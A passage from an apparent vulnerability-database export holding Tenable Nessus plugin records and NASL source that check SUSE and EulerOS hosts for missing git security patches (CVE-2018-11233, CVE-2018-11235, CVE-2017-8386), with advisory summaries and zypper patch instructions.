"p-cpe:/a:novell:suse_linux:git-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-email", "p-cpe:/a:novell:suse_linux:git-gui", "p-cpe:/a:novell:suse_linux:git-svn", "p-cpe:/a:novell:suse_linux:git-svn-debuginfo", "p-cpe:/a:novell:suse_linux:git-web", "p-cpe:/a:novell:suse_linux:gitk", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2018-1872-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120026", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1872-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120026);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2018:1872-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for git to version 2.16.4 fixes several issues. These\nsecurity issues were fixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed\n attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when\n recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181872-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05e8a403\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch SUSE-SLE-Module-Development-Tools-15-2018-1267=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-1267=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-arch-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-core-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-core-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-cvs-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-daemon-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-daemon-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-debugsource-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-email-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-gui-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-svn-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-svn-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"git-web-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"gitk-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-arch-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-core-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-core-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-cvs-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-daemon-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-daemon-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-debugsource-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-email-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-gui-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-svn-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-svn-debuginfo-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"git-web-2.16.4-3.3.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"gitk-2.16.4-3.3.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:02", "description": "This update for git fixes several issues. These security issues were fixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-08T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-1566-1.NASL", "href": "https://www.tenable.com/plugins/nessus/110411", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1566-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110411);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for git fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-11233: Path sanity-checks on NTFS allowed\n attackers to read arbitrary memory (bsc#1095218)\n\n - CVE-2018-11235: Arbitrary code execution when\n recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181566-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5d5ec3b7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 8:zypper in -t patch\nSUSE-OpenStack-Cloud-8-2018-1080=1\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-1080=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-1080=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-1080=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1080=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-1080=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-1080=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1080=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1080=1\n\nSUSE Enterprise Storage 4:zypper in -t patch\nSUSE-Storage-4-2018-1080=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2018-1080=1\n\nHPE Helion OpenStack 8:zypper in -t patch\nHPE-Helion-OpenStack-8-2018-1080=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1|2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1/2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:30:33", "description": "This update for git fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read arbitrary memory (bsc#1095218)\n\nCVE-2018-11235: Arbitrary code execution when recursively cloning a malicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-1566-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118260", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1566-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118260);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2018:1566-2)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for git fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-11233: Path sanity-checks on NTFS allowed attackers to read\narbitrary memory (bsc#1095218)\n\nCVE-2018-11235: Arbitrary code execution when recursively cloning a\nmalicious repository (bsc#1095219)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11235/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181566-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?875d920b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-1080=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"git-core-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"git-core-debuginfo-2.12.3-27.14.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"git-debugsource-2.12.3-27.14.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T18:18:04", "description": "According to the versions of the git package installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - A flaw was found in the way git-shell handled command-line options for the restricted set of git-shell commands. A remote, authenticated attacker could use this flaw to bypass git-shell restrictions, to view and manipulate files, by abusing the instance of the less command launched using crafted command-line options.(CVE-2017-8386)\n\n - In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-21T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 2.5.1 : git (EulerOS-SA-2018-1377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8386", "CVE-2018-11235"], "modified": "2022-05-26T00:00:00", "cpe": 